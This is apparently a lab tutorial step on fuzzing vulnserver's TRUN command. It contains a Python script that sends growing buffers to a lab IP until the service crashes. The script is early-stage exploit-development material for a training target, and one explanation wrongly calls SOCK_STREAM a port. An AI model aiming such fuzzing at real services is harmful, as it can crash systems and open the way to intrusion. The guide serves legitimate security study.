FUZZing

PRACTICE ! PRACTICE ! PRACTICE !

So now we know the TRUN command is vulnerable and it crashes the program, Let's fuzz the program to get some juicy information

Run the vulnserver.exe and Immunity Debugger as the Administrator user

Let's write a python script which will automate the Fuzzing process !

#!/usr/bin/python

import sys, socket
from time import sleep

buffer = "A" * 100

while True:
	try:
		s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
		s.connect(('192.168.0.104',9999))

		s.send(('TRUN /.:/' + buffer))
		s.close()
		sleep(1)

		buffer = buffer + "A" * 100

	except:

		print("Fuzzing crashed at %s bytes" % str(len(buffer)))
		sys.exit()

• We are gonna import the sys and socket so that we can call out the specific IP and port and connect to the server

• We are gonna import sleep so that we can sleep it for a second before trying this process over again and again

• We are declaring a buffer variable and have a 100 A's inside it - We are gonna loop this and try connecting it to the socket

AF_INET is our IPv4 and SOCK_STREAM is our Port

• We are now gonna send our buffer to run as a TRUN command - Basically send the 100 A's via the TRUN command

• Close the connection and sleep for a second !

• And then we are gonna append another 100 A's to the buffer variable and this goes inside the loop until it crashes

• Once we notice the vulnserver.exe has crashed in the debugger, we can immediately press CTRL + C to quit our python program and it raises an exception with the number of bytes the program has crashed - Which gives us an estimate count of bytes the vulnserver.exe has crashes !

We couldn't overwrite the EIP - thats okayy :)